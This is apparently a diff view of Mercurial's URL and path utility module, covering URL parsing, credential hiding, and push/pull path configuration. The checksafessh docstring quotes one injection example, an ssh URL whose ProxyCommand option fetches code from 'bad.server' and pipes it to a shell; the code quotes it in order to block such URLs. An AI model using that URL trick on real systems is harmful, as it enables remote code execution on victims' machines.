28 31 )
29 32
30 33 from ..revlogutils import (
31 34 constants as revlog_constants,
32 35 )
33 36
34 37 # keeps pyflakes happy
35 38 assert [Callable, Dict, Tuple, Union]
36 39
37 40 urlreq = urllibcompat.urlreq
38 41
39 42
40 43 def getport(port: Union[bytes, int]) -> int:
41 44 """Return the port for a given network service.
42 45
43 46 If port is an integer, it's returned as is. If it's a string, it's
44 47 looked up using socket.getservbyname(). If there's no matching
45 48 service, error.Abort is raised.
46 49 """
47 50 try:
48 51 return int(port)
49 52 except ValueError:
50 53 pass
51 54
52 55 try:
53 56 return socket.getservbyname(pycompat.sysstr(port))
54 57 except socket.error:
55 58 raise error.Abort(
56 59 _(b"no port number associated with service '%s'") % port
57 60 )
58 61
59 62
60 63 class url:
61 64 r"""Reliable URL parser.
62 65
63 66 This parses URLs and provides attributes for the following
64 67 components:
65 68
66 69 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
67 70
68 71 Missing components are set to None. The only exception is
69 72 fragment, which is set to '' if present but empty.
70 73
71 74 If parsefragment is False, fragment is included in query. If
72 75 parsequery is False, query is included in path. If both are
73 76 False, both fragment and query are included in path.
74 77
75 78 See http://www.ietf.org/rfc/rfc2396.txt for more information.
76 79
77 80 Note that for backward compatibility reasons, bundle URLs do not
78 81 take host names. That means 'bundle://../' has a path of '../'.
79 82
80 83 Examples:
81 84
82 85 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
83 86 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
84 87 >>> url(b'ssh://[::1]:2200//home/joe/repo')
85 88 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
86 89 >>> url(b'file:///home/joe/repo')
87 90 <url scheme: 'file', path: '/home/joe/repo'>
88 91 >>> url(b'file:///c:/temp/foo/')
89 92 <url scheme: 'file', path: 'c:/temp/foo/'>
90 93 >>> url(b'bundle:foo')
91 94 <url scheme: 'bundle', path: 'foo'>
92 95 >>> url(b'bundle://../foo')
93 96 <url scheme: 'bundle', path: '../foo'>
94 97 >>> url(br'c:\foo\bar')
95 98 <url path: 'c:\\foo\\bar'>
96 99 >>> url(br'\\blah\blah\blah')
97 100 <url path: '\\\\blah\\blah\\blah'>
98 101 >>> url(br'\\blah\blah\blah#baz')
99 102 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
100 103 >>> url(br'file:///C:\users\me')
101 104 <url scheme: 'file', path: 'C:\\users\\me'>
102 105
103 106 Authentication credentials:
104 107
105 108 >>> url(b'ssh://joe:xyz@x/repo')
106 109 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
107 110 >>> url(b'ssh://joe@x/repo')
108 111 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
109 112
110 113 Query strings and fragments:
111 114
112 115 >>> url(b'http://host/a?b#c')
113 116 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
114 117 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
115 118 <url scheme: 'http', host: 'host', path: 'a?b#c'>
116 119
117 120 Empty path:
118 121
119 122 >>> url(b'')
120 123 <url path: ''>
121 124 >>> url(b'#a')
122 125 <url path: '', fragment: 'a'>
123 126 >>> url(b'http://host/')
124 127 <url scheme: 'http', host: 'host', path: ''>
125 128 >>> url(b'http://host/#a')
126 129 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
127 130
128 131 Only scheme:
129 132
130 133 >>> url(b'http:')
131 134 <url scheme: 'http'>
132 135 """
133 136
134 137 _safechars = b"!~*'()+"
135 138 _safepchars = b"/!~*'()+:\\"
136 139 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
137 140
138 141 def __init__(
139 142 self,
140 143 path: bytes,
141 144 parsequery: bool = True,
142 145 parsefragment: bool = True,
143 146 ) -> None:
144 147 # We slowly chomp away at path until we have only the path left
145 148 self.scheme = self.user = self.passwd = self.host = None
146 149 self.port = self.path = self.query = self.fragment = None
147 150 self._localpath = True
148 151 self._hostport = b''
149 152 self._origpath = path
150 153
151 154 if parsefragment and b'#' in path:
152 155 path, self.fragment = path.split(b'#', 1)
153 156
154 157 # special case for Windows drive letters and UNC paths
155 158 if hasdriveletter(path) or path.startswith(b'\\\\'):
156 159 self.path = path
157 160 return
158 161
159 162 # For compatibility reasons, we can't handle bundle paths as
160 163 # normal URLS
161 164 if path.startswith(b'bundle:'):
162 165 self.scheme = b'bundle'
163 166 path = path[7:]
164 167 if path.startswith(b'//'):
165 168 path = path[2:]
166 169 self.path = path
167 170 return
168 171
169 172 if self._matchscheme(path):
170 173 parts = path.split(b':', 1)
171 174 if parts[0]:
172 175 self.scheme, path = parts
173 176 self._localpath = False
174 177
175 178 if not path:
176 179 path = None
177 180 if self._localpath:
178 181 self.path = b''
179 182 return
180 183 else:
181 184 if self._localpath:
182 185 self.path = path
183 186 return
184 187
185 188 if parsequery and b'?' in path:
186 189 path, self.query = path.split(b'?', 1)
187 190 if not path:
188 191 path = None
189 192 if not self.query:
190 193 self.query = None
191 194
192 195 # // is required to specify a host/authority
193 196 if path and path.startswith(b'//'):
194 197 parts = path[2:].split(b'/', 1)
195 198 if len(parts) > 1:
196 199 self.host, path = parts
197 200 else:
198 201 self.host = parts[0]
199 202 path = None
200 203 if not self.host:
201 204 self.host = None
202 205 # path of file:///d is /d
203 206 # path of file:///d:/ is d:/, not /d:/
204 207 if path and not hasdriveletter(path):
205 208 path = b'/' + path
206 209
207 210 if self.host and b'@' in self.host:
208 211 self.user, self.host = self.host.rsplit(b'@', 1)
209 212 if b':' in self.user:
210 213 self.user, self.passwd = self.user.split(b':', 1)
211 214 if not self.host:
212 215 self.host = None
213 216
214 217 # Don't split on colons in IPv6 addresses without ports
215 218 if (
216 219 self.host
217 220 and b':' in self.host
218 221 and not (
219 222 self.host.startswith(b'[') and self.host.endswith(b']')
220 223 )
221 224 ):
222 225 self._hostport = self.host
223 226 self.host, self.port = self.host.rsplit(b':', 1)
224 227 if not self.host:
225 228 self.host = None
226 229
227 230 if (
228 231 self.host
229 232 and self.scheme == b'file'
230 233 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
231 234 ):
232 235 raise error.Abort(
233 236 _(b'file:// URLs can only refer to localhost')
234 237 )
235 238
236 239 self.path = path
237 240
238 241 # leave the query string escaped
239 242 for a in ('user', 'passwd', 'host', 'port', 'path', 'fragment'):
240 243 v = getattr(self, a)
241 244 if v is not None:
242 245 setattr(self, a, urlreq.unquote(v))
243 246
244 247 def copy(self):
245 248 u = url(b'temporary useless value')
246 249 u.path = self.path
247 250 u.scheme = self.scheme
248 251 u.user = self.user
249 252 u.passwd = self.passwd
250 253 u.host = self.host
251 254 u.port = self.port
252 255 u.query = self.query
253 256 u.fragment = self.fragment
254 257 u._localpath = self._localpath
255 258 u._hostport = self._hostport
256 259 u._origpath = self._origpath
257 260 return u
258 261
259 262 @encoding.strmethod
260 263 def __repr__(self):
261 264 attrs = []
262 265 for a in (
263 266 'scheme',
264 267 'user',
265 268 'passwd',
266 269 'host',
267 270 'port',
268 271 'path',
269 272 'query',
270 273 'fragment',
271 274 ):
272 275 v = getattr(self, a)
273 276 if v is not None:
274 277 line = b'%s: %r'
275 278 line %= (pycompat.bytestr(a), pycompat.bytestr(v))
276 279 attrs.append(line)
277 280 return b'<url %s>' % b', '.join(attrs)
278 281
279 282 def __bytes__(self):
280 283 r"""Join the URL's components back into a URL string.
281 284
282 285 Examples:
283 286
284 287 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
285 288 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
286 289 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
287 290 'http://user:pw@host:80/?foo=bar&baz=42'
288 291 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
289 292 'http://user:pw@host:80/?foo=bar%3dbaz'
290 293 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
291 294 'ssh://user:pw@[::1]:2200//home/joe#'
292 295 >>> bytes(url(b'http://localhost:80//'))
293 296 'http://localhost:80//'
294 297 >>> bytes(url(b'http://localhost:80/'))
295 298 'http://localhost:80/'
296 299 >>> bytes(url(b'http://localhost:80'))
297 300 'http://localhost:80/'
298 301 >>> bytes(url(b'bundle:foo'))
299 302 'bundle:foo'
300 303 >>> bytes(url(b'bundle://../foo'))
301 304 'bundle:../foo'
302 305 >>> bytes(url(b'path'))
303 306 'path'
304 307 >>> bytes(url(b'file:///tmp/foo/bar'))
305 308 'file:///tmp/foo/bar'
306 309 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
307 310 'file:///c:/tmp/foo/bar'
308 311 >>> print(url(br'bundle:foo\bar'))
309 312 bundle:foo\bar
310 313 >>> print(url(br'file:///D:\data\hg'))
311 314 file:///D:\data\hg
312 315 """
313 316 if self._localpath:
314 317 s = self.path
315 318 if self.scheme == b'bundle':
316 319 s = b'bundle:' + s
317 320 if self.fragment:
318 321 s += b'#' + self.fragment
319 322 return s
320 323
321 324 s = self.scheme + b':'
322 325 if self.user or self.passwd or self.host:
323 326 s += b'//'
324 327 elif self.scheme and (
325 328 not self.path
326 329 or self.path.startswith(b'/')
327 330 or hasdriveletter(self.path)
328 331 ):
329 332 s += b'//'
330 333 if hasdriveletter(self.path):
331 334 s += b'/'
332 335 if self.user:
333 336 s += urlreq.quote(self.user, safe=self._safechars)
334 337 if self.passwd:
335 338 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
336 339 if self.user or self.passwd:
337 340 s += b'@'
338 341 if self.host:
339 342 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
340 343 s += urlreq.quote(self.host)
341 344 else:
342 345 s += self.host
343 346 if self.port:
344 347 s += b':' + urlreq.quote(self.port)
345 348 if self.host:
346 349 s += b'/'
347 350 if self.path:
348 351 # TODO: similar to the query string, we should not unescape the
349 352 # path when we store it, the path might contain '%2f' = '/',
350 353 # which we should *not* escape.
351 354 s += urlreq.quote(self.path, safe=self._safepchars)
352 355 if self.query:
353 356 # we store the query in escaped form.
354 357 s += b'?' + self.query
355 358 if self.fragment is not None:
356 359 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
357 360 return s
358 361
359 362 __str__ = encoding.strmethod(__bytes__)
360 363
361 364 def authinfo(self):
362 365 user, passwd = self.user, self.passwd
363 366 try:
364 367 self.user, self.passwd = None, None
365 368 s = bytes(self)
366 369 finally:
367 370 self.user, self.passwd = user, passwd
368 371 if not self.user:
369 372 return (s, None)
370 373 # authinfo[1] is passed to urllib2 password manager, and its
371 374 # URIs must not contain credentials. The host is passed in the
372 375 # URIs list because Python < 2.4.3 uses only that to search for
373 376 # a password.
374 377 return (s, (None, (s, self.host), self.user, self.passwd or b''))
375 378
376 379 def isabs(self):
377 380 if self.scheme and self.scheme != b'file':
378 381 return True # remote URL
379 382 if hasdriveletter(self.path):
380 383 return True # absolute for our purposes - can't be joined()
381 384 if self.path.startswith(br'\\'):
382 385 return True # Windows UNC path
383 386 if self.path.startswith(b'/'):
384 387 return True # POSIX-style
385 388 return False
386 389
387 390 def localpath(self) -> bytes:
388 391 if self.scheme == b'file' or self.scheme == b'bundle':
389 392 path = self.path or b'/'
390 393 # For Windows, we need to promote hosts containing drive
391 394 # letters to paths with drive letters.
392 395 if hasdriveletter(self._hostport):
393 396 path = self._hostport + b'/' + self.path
394 397 elif (
395 398 self.host is not None and self.path and not hasdriveletter(path)
396 399 ):
397 400 path = b'/' + path
398 401 return path
399 402 return self._origpath
400 403
401 404 def islocal(self):
402 405 '''whether localpath will return something that posixfile can open'''
403 406 return (
404 407 not self.scheme
405 408 or self.scheme == b'file'
406 409 or self.scheme == b'bundle'
407 410 )
408 411
409 412
410 413 def hasscheme(path: bytes) -> bool:
411 414 return bool(url(path).scheme) # cast to help pytype
412 415
413 416
414 417 def hasdriveletter(path: bytes) -> bool:
415 418 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
416 419
417 420
418 421 def urllocalpath(path: bytes) -> bytes:
419 422 return url(path, parsequery=False, parsefragment=False).localpath()
420 423
421 424
422 425 def checksafessh(path: bytes) -> None:
423 426 """check if a path / url is a potentially unsafe ssh exploit (SEC)
424 427
425 428 This is a sanity check for ssh urls. ssh will parse the first item as
426 429 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
427 430 Let's prevent these potentially exploited urls entirely and warn the
428 431 user.
429 432
430 433 Raises an error.Abort when the url is unsafe.
431 434 """
432 435 path = urlreq.unquote(path)
433 436 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
434 437 raise error.Abort(
435 438 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
436 439 )
437 440
438 441
439 442 def hidepassword(u: bytes) -> bytes:
440 443 '''hide user credential in a url string'''
441 444 u = url(u)
442 445 if u.passwd:
443 446 u.passwd = b'***'
444 447 return bytes(u)
445 448
446 449
447 450 def removeauth(u: bytes) -> bytes:
448 451 '''remove all authentication information from a url string'''
449 452 u = url(u)
450 453 u.user = u.passwd = None
451 454 return bytes(u)
452 455
453 456
454 457 def list_paths(ui, target_path=None):
455 458 """list all the (name, paths) in the passed ui"""
456 459 result = []
457 460 if target_path is None:
458 461 for name, paths in sorted(ui.paths.items()):
459 462 for p in paths:
460 463 result.append((name, p))
461 464
462 465 else:
463 466 for path in ui.paths.get(target_path, []):
464 467 result.append((target_path, path))
465 468 return result
466 469
467 470
468 471 def try_path(ui, url):
469 472 """try to build a path from a url
470 473
471 474 Return None if no Path could built.
472 475 """
473 476 try:
474 477 # we pass the ui instance are warning might need to be issued
475 478 return path(ui, None, rawloc=url)
476 479 except ValueError:
477 480 return None
478 481
479 482
480 483 def get_push_paths(repo, ui, dests):
481 484 """yields all the `path` selected as push destination by `dests`"""
482 485 if not dests:
483 486 if b'default-push' in ui.paths:
484 487 for p in ui.paths[b'default-push']:
485 488 yield p.get_push_variant()
486 489 elif b'default' in ui.paths:
487 490 for p in ui.paths[b'default']:
488 491 yield p.get_push_variant()
489 492 else:
490 493 raise error.ConfigError(
491 494 _(b'default repository not configured!'),
492 495 hint=_(b"see 'hg help config.paths'"),
493 496 )
494 497 else:
495 498 for dest in dests:
496 499 if dest in ui.paths:
497 500 for p in ui.paths[dest]:
498 501 yield p.get_push_variant()
499 502 else:
500 503 path = try_path(ui, dest)
501 504 if path is None:
502 505 msg = _(b'repository %s does not exist')
503 506 msg %= dest
504 507 raise error.RepoError(msg)
505 508 yield path.get_push_variant()
506 509
507 510
508 511 def get_pull_paths(repo, ui, sources):
509 512 """yields all the `(path, branch)` selected as pull source by `sources`"""
510 513 if not sources:
511 514 sources = [b'default']
512 515 for source in sources:
513 516 if source in ui.paths:
514 517 for p in ui.paths[source]:
515 518 yield p
516 519 else:
517 520 p = path(ui, None, source, validate_path=False)
518 521 yield p
519 522
520 523
521 524 def get_unique_push_path(action, repo, ui, dest=None):
522 525 """return a unique `path` or abort if multiple are found
523 526
524 527 This is useful for command and action that does not support multiple
525 528 destination (yet).
526 529
527 530 The `action` parameter will be used for the error message.
528 531 """
529 532 if dest is None:
530 533 dests = []
531 534 else:
532 535 dests = [dest]
533 536 dests = list(get_push_paths(repo, ui, dests))
534 537 if len(dests) != 1:
535 538 if dest is None:
536 539 msg = _(
537 540 b"default path points to %d urls while %s only supports one"
538 541 )
539 542 msg %= (len(dests), action)
540 543 else:
541 544 msg = _(b"path points to %d urls while %s only supports one: %s")
542 545 msg %= (len(dests), action, dest)
543 546 raise error.Abort(msg)
544 547 return dests[0]
545 548
546 549
547 550 def get_unique_pull_path_obj(action, ui, source=None):
548 551 """return a unique `(path, branch)` or abort if multiple are found
549 552
550 553 This is useful for command and action that does not support multiple
551 554 destination (yet).
552 555
553 556 The `action` parameter will be used for the error message.
554 557
555 558 note: Ideally, this function would be called `get_unique_pull_path` to
556 559 mirror the `get_unique_push_path`, but the name was already taken.
557 560 """
558 561 sources = []
559 562 if source is not None:
560 563 sources.append(source)
561 564
562 565 pull_paths = list(get_pull_paths(None, ui, sources=sources))
563 566 path_count = len(pull_paths)
564 567 if path_count != 1:
565 568 if source is None:
566 569 msg = _(
567 570 b"default path points to %d urls while %s only supports one"
568 571 )
569 572 msg %= (path_count, action)
570 573 else:
571 574 msg = _(b"path points to %d urls while %s only supports one: %s")
572 575 msg %= (path_count, action, source)
573 576 raise error.Abort(msg)
574 577 return pull_paths[0]
575 578
576 579
577 580 def get_unique_pull_path(action, repo, ui, source=None, default_branches=()):
578 581 """return a unique `(url, branch)` or abort if multiple are found
579 582
580 583 See `get_unique_pull_path_obj` for details.
581 584 """
582 585 path = get_unique_pull_path_obj(action, ui, source=source)
583 586 return parseurl(path.rawloc, default_branches)
584 587
585 588
586 589 def get_clone_path_obj(ui, source):
587 590 """return the `(origsource, url, branch)` selected as clone source"""
588 591 if source == b'':
589 592 return None
590 593 return get_unique_pull_path_obj(b'clone', ui, source=source)
591 594
592 595
593 596 def get_clone_path(ui, source, default_branches=None):
594 597 """return the `(origsource, url, branch)` selected as clone source"""
595 598 path = get_clone_path_obj(ui, source)
596 599 if path is None:
597 600 return (b'', b'', (None, default_branches))
598 601 if default_branches is None:
599 602 default_branches = []
600 603 branches = (path.branch, default_branches)
601 604 return path.rawloc, path.loc, branches
602 605
603 606
604 607 def parseurl(path, branches=None):
605 608 '''parse url#branch, returning (url, (branch, branches))'''
606 609 u = url(path)
607 610 branch = None
608 611 if u.fragment:
609 612 branch = u.fragment
610 613 u.fragment = None
611 614 return bytes(u), (branch, branches or [])
612 615
613 616
614 617 class paths(dict):
615 618 """Represents a collection of paths and their configs.
616 619
617 620 Data is initially derived from ui instances and the config files they have
618 621 loaded.
619 622 """
620 623
621 624 def __init__(self, ui):
622 625 dict.__init__(self)
623 626
624 627 home_path = os.path.expanduser(b'~')
625 628
626 629 for name, value in ui.configitems(b'paths', ignoresub=True):
627 630 # No location is the same as not existing.
628 631 if not value:
629 632 continue
630 633 _value, sub_opts = ui.configsuboptions(b'paths', name)
631 634 s = ui.configsource(b'paths', name)
632 635 root_key = (name, value, s)
633 636 root = ui._path_to_root.get(root_key, home_path)
634 637
635 638 multi_url = sub_opts.get(b'multi-urls')
636 639 if multi_url is not None and stringutil.parsebool(multi_url):
637 640 base_locs = stringutil.parselist(value)
638 641 else:
639 642 base_locs = [value]
640 643
641 644 paths = []
642 645 for loc in base_locs:
643 646 loc = os.path.expandvars(loc)
644 647 loc = os.path.expanduser(loc)
645 648 if not hasscheme(loc) and not os.path.isabs(loc):
646 649 loc = os.path.normpath(os.path.join(root, loc))
647 650 p = path(ui, name, rawloc=loc, suboptions=sub_opts)
648 651 paths.append(p)
649 652 self[name] = paths
650 653
651 654 for name, old_paths in sorted(self.items()):
652 655 new_paths = []
653 656 for p in old_paths:
654 657 new_paths.extend(_chain_path(p, ui, self))
655 658 self[name] = new_paths
656 659
657 660
658 661 _pathsuboptions: "Dict[bytes, Tuple[str, Callable]]" = {}
659 662 # a dictionnary of methods that can be used to format a sub-option value
660 663 path_suboptions_display = {}
661 664
662 665
663 666 def pathsuboption(option: bytes, attr: str, display=pycompat.bytestr):
664 667 """Decorator used to declare a path sub-option.
665 668
666 669 Arguments are the sub-option name and the attribute it should set on
667 670 ``path`` instances.
668 671
669 672 The decorated function will receive as arguments a ``ui`` instance,
670 673 ``path`` instance, and the string value of this option from the config.
671 674 The function should return the value that will be set on the ``path``
672 675 instance.
673 676
674 677 The optional `display` argument is a function that can be used to format
675 678 the value when displayed to the user (like in `hg paths` for example).
676 679
677 680 This decorator can be used to perform additional verification of
678 681 sub-options and to change the type of sub-options.
679 682 """
680 683 if isinstance(attr, bytes):
681 684 msg = b'pathsuboption take `str` as "attr" argument, not `bytes`'
682 685 raise TypeError(msg)
683 686
684 687 def register(func):
685 688 _pathsuboptions[option] = (attr, func)
686 689 path_suboptions_display[option] = display
687 690 return func
688 691
689 692 return register
690 693
691 694
692 695 def display_bool(value):
693 696 """display a boolean suboption back to the user"""
694 697 return b'yes' if value else b'no'
695 698
696 699
697 700 @pathsuboption(b'pushurl', '_pushloc')
698 701 def pushurlpathoption(ui, path, value):
699 702 u = url(value)
700 703 # Actually require a URL.
701 704 if not u.scheme:
702 705 msg = _(b'(paths.%s:pushurl not a URL; ignoring: "%s")\n')
703 706 msg %= (path.name, value)
704 707 ui.warn(msg)
705 708 return None
706 709
707 710 # Don't support the #foo syntax in the push URL to declare branch to
708 711 # push.
709 712 if u.fragment:
710 713 ui.warn(
711 714 _(
712 715 b'("#fragment" in paths.%s:pushurl not supported; '
713 716 b'ignoring)\n'
714 717 )
715 718 % path.name
716 719 )
717 720 u.fragment = None
718 721
719 722 return bytes(u)
720 723
721 724
722 725 @pathsuboption(b'pushrev', 'pushrev')
723 726 def pushrevpathoption(ui, path, value):
724 727 return value
725 728
726 729
727 730 SUPPORTED_BOOKMARKS_MODES = {
728 731 b'default',
729 732 b'mirror',
730 733 b'ignore',
731 734 }
732 735
733 736
734 737 @pathsuboption(b'bookmarks.mode', 'bookmarks_mode')
735 738 def bookmarks_mode_option(ui, path, value):
736 739 if value not in SUPPORTED_BOOKMARKS_MODES:
737 740 path_name = path.name
738 741 if path_name is None:
739 742 # this is an "anonymous" path, config comes from the global one
740 743 path_name = b'*'
741 744 msg = _(b'(paths.%s:bookmarks.mode has unknown value: "%s")\n')
742 745 msg %= (path_name, value)
743 746 ui.warn(msg)
744 747 if value == b'default':
745 748 value = None
746 749 return value
747 750
748 751
749 752 DELTA_REUSE_POLICIES = {
750 753 b'default': None,
751 754 b'try-base': revlog_constants.DELTA_BASE_REUSE_TRY,
752 755 b'no-reuse': revlog_constants.DELTA_BASE_REUSE_NO,
753 756 b'forced': revlog_constants.DELTA_BASE_REUSE_FORCE,
754 757 }
755 758 DELTA_REUSE_POLICIES_NAME = dict(i[::-1] for i in DELTA_REUSE_POLICIES.items())
756 759
757 760
758 761 @pathsuboption(
759 762 b'pulled-delta-reuse-policy',
760 763 'delta_reuse_policy',
761 764 display=DELTA_REUSE_POLICIES_NAME.get,
762 765 )
763 766 def delta_reuse_policy(ui, path, value):
764 767 if value not in DELTA_REUSE_POLICIES:
765 768 path_name = path.name
766 769 if path_name is None:
767 770 # this is an "anonymous" path, config comes from the global one
768 771 path_name = b'*'
769 772 msg = _(
770 773 b'(paths.%s:pulled-delta-reuse-policy has unknown value: "%s")\n'
771 774 )
772 775 msg %= (path_name, value)
773 776 ui.warn(msg)
774 777 return DELTA_REUSE_POLICIES.get(value)
775 778
776 779
777 780 @pathsuboption(b'multi-urls', 'multi_urls', display=display_bool)
778 781 def multiurls_pathoption(ui, path, value):
779 782 res = stringutil.parsebool(value)
780 783 if res is None:
781 784 ui.warn(
782 785 _(b'(paths.%s:multi-urls not a boolean; ignoring)\n') % path.name
783 786 )
784 787 res = False
785 788 return res
786 789
787 790
788 791 def _chain_path(base_path, ui, paths):
789 792 """return the result of "path://" logic applied on a given path"""
790 793 new_paths = []
791 794 if base_path.url.scheme != b'path':
792 795 new_paths.append(base_path)
793 796 else:
794 797 assert base_path.url.path is None
795 798 sub_paths = paths.get(base_path.url.host)
796 799 if sub_paths is None:
797 800 m = _(b'cannot use `%s`, "%s" is not a known path')
798 801 m %= (base_path.rawloc, base_path.url.host)
799 802 raise error.Abort(m)
800 803 for subpath in sub_paths:
801 804 path = base_path.copy()
802 805 if subpath.raw_url.scheme == b'path':
803 806 m = _(b'cannot use `%s`, "%s" is also defined as a `path://`')
804 807 m %= (path.rawloc, path.url.host)
805 808 raise error.Abort(m)
806 809 path.url = subpath.url
807 810 path.rawloc = subpath.rawloc
808 811 path.loc = subpath.loc
809 812 if path.branch is None:
810 813 path.branch = subpath.branch
811 814 else:
812 815 base = path.rawloc.rsplit(b'#', 1)[0]
813 816 path.rawloc = b'%s#%s' % (base, path.branch)
814 817 suboptions = subpath._all_sub_opts.copy()
815 818 suboptions.update(path._own_sub_opts)
816 819 path._apply_suboptions(ui, suboptions)
817 820 new_paths.append(path)
818 821 return new_paths
819 822
820 823
821 824 class path:
822 825 """Represents an individual path and its configuration."""
823 826
824 827 def __init__(
825 828 self,
826 829 ui=None,
827 830 name=None,
828 831 rawloc=None,
829 832 suboptions=None,
830 833 validate_path=True,
831 834 ):
832 835 """Construct a path from its config options.
833 836
834 837 ``ui`` is the ``ui`` instance the path is coming from.
835 838 ``name`` is the symbolic name of the path.
836 839 ``rawloc`` is the raw location, as defined in the config.
837 840 ``_pushloc`` is the raw locations pushes should be made to.
838 841 (see the `get_push_variant` method)
839 842
840 843 If ``name`` is not defined, we require that the location be a) a local
841 844 filesystem path with a .hg directory or b) a URL. If not,
842 845 ``ValueError`` is raised.
843 846 """
844 847 if ui is None:
845 848 # used in copy
846 849 assert name is None
847 850 assert rawloc is None
848 851 assert suboptions is None
849 852 return
850 853
851 854 if not rawloc:
852 855 raise ValueError(b'rawloc must be defined')
853 856
854 857 self.name = name
855 858
856 859 # set by path variant to point to their "non-push" version
857 860 self.main_path = None
858 861 self._setup_url(rawloc)
859 862
860 863 if validate_path:
861 864 self._validate_path()
862 865
863 866 _path, sub_opts = ui.configsuboptions(b'paths', b'*')
864 867 self._own_sub_opts = {}
865 868 if suboptions is not None:
866 869 self._own_sub_opts = suboptions.copy()
867 870 sub_opts.update(suboptions)
868 871 self._all_sub_opts = sub_opts.copy()
869 872
870 873 self._apply_suboptions(ui, sub_opts)
871 874
872 875 def _setup_url(self, rawloc):
873 876 # Locations may define branches via syntax <base>#<branch>.
874 877 u = url(rawloc)
875 878 branch = None
876 879 if u.fragment:
877 880 branch = u.fragment
878 881 u.fragment = None
879 882
880 883 self.url = u
881 884 # the url from the config/command line before dealing with `path://`
882 885 self.raw_url = u.copy()
883 886 self.branch = branch
884 887
885 888 self.rawloc = rawloc
886 889 self.loc = b'%s' % u
887 890
888 891 def copy(self, new_raw_location=None):
889 892 """make a copy of this path object
890 893
891 894 When `new_raw_location` is set, the new path will point to it.
892 895 This is used by the scheme extension so expand the scheme.
893 896 """
894 897 new = self.__class__()
895 898 for k, v in self.__dict__.items():
896 899 new_copy = getattr(v, 'copy', None)
897 900 if new_copy is not None:
898 901 v = new_copy()
899 902 new.__dict__[k] = v
900 903 if new_raw_location is not None:
901 904 new._setup_url(new_raw_location)
902 905 return new
903 906
904 907 @property
905 908 def is_push_variant(self):
906 909 """is this a path variant to be used for pushing"""
907 910 return self.main_path is not None
908 911
909 912 def get_push_variant(self):
910 913 """get a "copy" of the path, but suitable for pushing
911 914
912 915 This means using the value of the `pushurl` option (if any) as the url.
913 916
914 917 The original path is available in the `main_path` attribute.
915 918 """
916 919 if self.main_path:
917 920 return self
918 921 new = self.copy()
919 922 new.main_path = self
920 923 if self._pushloc:
921 924 new._setup_url(self._pushloc)
922 925 return new
923 926
924 927 def _validate_path(self):
925 928 # When given a raw location but not a symbolic name, validate the
926 929 # location is valid.
927 930 if (
928 931 not self.name
929 932 and not self.url.scheme
930 933 and not self._isvalidlocalpath(self.loc)
931 934 ):
932 935 raise ValueError(
933 936 b'location is not a URL or path to a local '
934 937 b'repo: %s' % self.rawloc
935 938 )
936 939
937 940 def _apply_suboptions(self, ui, sub_options):
938 941 # Now process the sub-options. If a sub-option is registered, its
939 942 # attribute will always be present. The value will be None if there
940 943 # was no valid sub-option.
941 944 for suboption, (attr, func) in _pathsuboptions.items():
942 945 if suboption not in sub_options:
943 946 setattr(self, attr, None)
944 947 continue
945 948
946 949 value = func(ui, self, sub_options[suboption])
947 950 setattr(self, attr, value)
948 951
949 952 def _isvalidlocalpath(self, path):
950 953 """Returns True if the given path is a potentially valid repository.
951 954 This is its own function so that extensions can change the definition of
952 955 'valid' in this case (like when pulling from a git repo into a hg
953 956 one)."""
954 957 try:
955 958 return os.path.isdir(os.path.join(path, b'.hg'))
956 959 # Python 2 may return TypeError. Python 3, ValueError.
957 960 except (TypeError, ValueError):
958 961 return False
959 962
960 963 @property
961 964 def suboptions(self):
962 965 """Return sub-options and their values for this path.
963 966
964 967 This is intended to be used for presentation purposes.
965 968 """
966 969 d = {}
967 970 for subopt, (attr, _func) in _pathsuboptions.items():
968 971 value = getattr(self, attr)
969 972 if value is not None:
970 973 d[subopt] = value
971 974 return d
General Comments 0
You need to be logged in to leave comments. Login now